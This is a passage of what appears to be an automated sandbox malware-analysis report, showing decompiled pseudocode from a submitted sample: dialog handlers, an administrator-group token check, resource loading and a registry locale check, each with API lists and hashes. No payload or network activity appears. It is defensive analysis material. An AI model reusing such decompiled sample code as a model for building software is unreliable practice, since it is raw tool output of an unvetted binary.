                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00e83108
                                                                                                                                                                                                        0x00e8310b
                                                                                                                                                                                                        0x00e831b7
                                                                                                                                                                                                        0x00e831ca
                                                                                                                                                                                                        0x00e831d0
                                                                                                                                                                                                        0x00e831d0
                                                                                                                                                                                                        0x00e831da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e831da
                                                                                                                                                                                                        0x00e83111
                                                                                                                                                                                                        0x00e83114
                                                                                                                                                                                                        0x00e83136
                                                                                                                                                                                                        0x00e83136
                                                                                                                                                                                                        0x00e83138
                                                                                                                                                                                                        0x00e8313b
                                                                                                                                                                                                        0x00e83141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83143
                                                                                                                                                                                                        0x00e83116
                                                                                                                                                                                                        0x00e8311b
                                                                                                                                                                                                        0x00e8314b
                                                                                                                                                                                                        0x00e83151
                                                                                                                                                                                                        0x00e83158
                                                                                                                                                                                                        0x00e8316a
                                                                                                                                                                                                        0x00e83176
                                                                                                                                                                                                        0x00e8317d
                                                                                                                                                                                                        0x00e8318b
                                                                                                                                                                                                        0x00e8319e
                                                                                                                                                                                                        0x00e831a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e831ad
                                                                                                                                                                                                        0x00e83120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8312a
                                                                                                                                                                                                        0x00e83134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83134
                                                                                                                                                                                                        0x00e8312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E8313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00E8316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E83176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00E8317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00E83185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00E83190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00E830C0), ref: 00E831A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00E831CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 1b3eea6928abd32c43664690ba158e530d6fb6fe3b2ebeaa52d05e9459b073a9
                                                                                                                                                                                                        • Instruction ID: dc5fb68e7e27674abaec61d372a44740d8731588884bd3cc380a1c3d50e2400b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3eea6928abd32c43664690ba158e530d6fb6fe3b2ebeaa52d05e9459b073a9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8611B131246211BFEB216F75ED0CB9A3AA4FB4AF25F141622F81DB11E0DB749649C742
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00E818A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xe88128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00E86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00E817EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xe88128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe88128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e818a3
                                                                                                                                                                                                        0x00e818a3
                                                                                                                                                                                                        0x00e818ab
                                                                                                                                                                                                        0x00e818b2
                                                                                                                                                                                                        0x00e818b5
                                                                                                                                                                                                        0x00e818be
                                                                                                                                                                                                        0x00e818c0
                                                                                                                                                                                                        0x00e818c6
                                                                                                                                                                                                        0x00e818c7
                                                                                                                                                                                                        0x00e818ca
                                                                                                                                                                                                        0x00e818cf
                                                                                                                                                                                                        0x00e819c9
                                                                                                                                                                                                        0x00e819d8
                                                                                                                                                                                                        0x00e819d8
                                                                                                                                                                                                        0x00e818df
                                                                                                                                                                                                        0x00e819b8
                                                                                                                                                                                                        0x00e819bd
                                                                                                                                                                                                        0x00e819bf
                                                                                                                                                                                                        0x00e819bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e819bd
                                                                                                                                                                                                        0x00e818fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81912
                                                                                                                                                                                                        0x00e819aa
                                                                                                                                                                                                        0x00e819ad
                                                                                                                                                                                                        0x00e819b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81927
                                                                                                                                                                                                        0x00e81927
                                                                                                                                                                                                        0x00e81932
                                                                                                                                                                                                        0x00e81936
                                                                                                                                                                                                        0x00e819a9
                                                                                                                                                                                                        0x00e819a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e819a9
                                                                                                                                                                                                        0x00e8194c
                                                                                                                                                                                                        0x00e819a2
                                                                                                                                                                                                        0x00e819a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8196e
                                                                                                                                                                                                        0x00e81970
                                                                                                                                                                                                        0x00e81999
                                                                                                                                                                                                        0x00e8199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8199c
                                                                                                                                                                                                        0x00e81972
                                                                                                                                                                                                        0x00e81972
                                                                                                                                                                                                        0x00e81975
                                                                                                                                                                                                        0x00e81984
                                                                                                                                                                                                        0x00e81985
                                                                                                                                                                                                        0x00e8198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8198c
                                                                                                                                                                                                        0x00e81991
                                                                                                                                                                                                        0x00e81996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81996
                                                                                                                                                                                                        0x00e8194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E818DD), ref: 00E8181A
                                                                                                                                                                                                          • Part of subcall function 00E817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E8182C
                                                                                                                                                                                                          • Part of subcall function 00E817EE: AllocateAndInitializeSid.ADVAPI32(00E818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E818DD), ref: 00E81855
                                                                                                                                                                                                          • Part of subcall function 00E817EE: FreeSid.ADVAPI32(?,?,?,?,00E818DD), ref: 00E81883
                                                                                                                                                                                                          • Part of subcall function 00E817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00E818DD), ref: 00E8188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00E818EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E818F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00E8190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00E81918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00E8192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00E81944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E81964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00E8197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00E8199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00E819A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E819AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 97b649223325090162b8702584ece64e42c1be72707625413df19e15a7ba19eb
                                                                                                                                                                                                        • Instruction ID: d9fc43b6764c30d2759b8d24ca8b152733cb5b5b5e7672a7a1c491e4e89091b3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97b649223325090162b8702584ece64e42c1be72707625413df19e15a7ba19eb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D313D71A00209EFEB20AFA6DC48AAFBBBCFB44704F141465E54DF2150DB34990ACB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00e84699
                                                                                                                                                                                                        0x00e8469b
                                                                                                                                                                                                        0x00e846a9
                                                                                                                                                                                                        0x00e846af
                                                                                                                                                                                                        0x00e846b4
                                                                                                                                                                                                        0x00e846bc
                                                                                                                                                                                                        0x00e846f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e846f9
                                                                                                                                                                                                        0x00e846d9
                                                                                                                                                                                                        0x00e846dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e846e5
                                                                                                                                                                                                        0x00e846ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e846f5
                                                                                                                                                                                                        0x00e846ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 2c748ccbeb8b087d3658caf5a6f43f2ddf227aa61442d67aa43341e27fc8bc53
                                                                                                                                                                                                        • Instruction ID: 55d98efbb0b279b8f1b05666a07c6cd24d27b3cadc2bb96f431665c3e5433f4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c748ccbeb8b087d3658caf5a6f43f2ddf227aa61442d67aa43341e27fc8bc53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1601D6732402017FF32027A69C0CF6B3E2CDBC6B55F0C0025FA4DB6190D971884493A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E8681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xe881d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xe881d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xe881d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xe81140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00E866F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xe881d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t18 =  &_v8; // 0xe8463b
                                                                                                                                                                                                        				return E00E86CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00e8681f
                                                                                                                                                                                                        0x00e8682a
                                                                                                                                                                                                        0x00e86831
                                                                                                                                                                                                        0x00e86836
                                                                                                                                                                                                        0x00e8683c
                                                                                                                                                                                                        0x00e8683e
                                                                                                                                                                                                        0x00e86848
                                                                                                                                                                                                        0x00e86851
                                                                                                                                                                                                        0x00e8685d
                                                                                                                                                                                                        0x00e86864
                                                                                                                                                                                                        0x00e86876
                                                                                                                                                                                                        0x00e8693a
                                                                                                                                                                                                        0x00e8693a
                                                                                                                                                                                                        0x00e8687c
                                                                                                                                                                                                        0x00e8687e
                                                                                                                                                                                                        0x00e86885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e868d6
                                                                                                                                                                                                        0x00e868f4
                                                                                                                                                                                                        0x00e86900
                                                                                                                                                                                                        0x00e86902
                                                                                                                                                                                                        0x00e8690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8690c
                                                                                                                                                                                                        0x00e8690c
                                                                                                                                                                                                        0x00e8691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8691e
                                                                                                                                                                                                        0x00e86924
                                                                                                                                                                                                        0x00e8692b
                                                                                                                                                                                                        0x00e86932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8692b
                                                                                                                                                                                                        0x00e8691c
                                                                                                                                                                                                        0x00e8690a
                                                                                                                                                                                                        0x00e86885
                                                                                                                                                                                                        0x00e86876
                                                                                                                                                                                                        0x00e86940
                                                                                                                                                                                                        0x00e86951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E8686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00E868A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E868CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,?,0000000C), ref: 00E868F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E86902
                                                                                                                                                                                                          • Part of subcall function 00E866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00E8691A), ref: 00E86741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: ;F$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-574545411
                                                                                                                                                                                                        • Opcode ID: 8204b3991a9db42ae99c3e3a51a207d2348b1737bea5973d2d303a6a8cdca3ba
                                                                                                                                                                                                        • Instruction ID: f75dd77dd476c104d7996800f26a7eaff2f996838a4f26e0b044a0cf9056ce74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8204b3991a9db42ae99c3e3a51a207d2348b1737bea5973d2d303a6a8cdca3ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99319331A01318DFDB31EB16CD45BAAB7B9EB85728F0411A5E94DB21A0DB309D89CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00E843D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xe89404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe891dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00e83459
                                                                                                                                                                                                        0x00e8345c
                                                                                                                                                                                                        0x00e834d8
                                                                                                                                                                                                        0x00e834de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e834e0
                                                                                                                                                                                                        0x00e8345e
                                                                                                                                                                                                        0x00e83463
                                                                                                                                                                                                        0x00e8349a
                                                                                                                                                                                                        0x00e834a0
                                                                                                                                                                                                        0x00e834a7
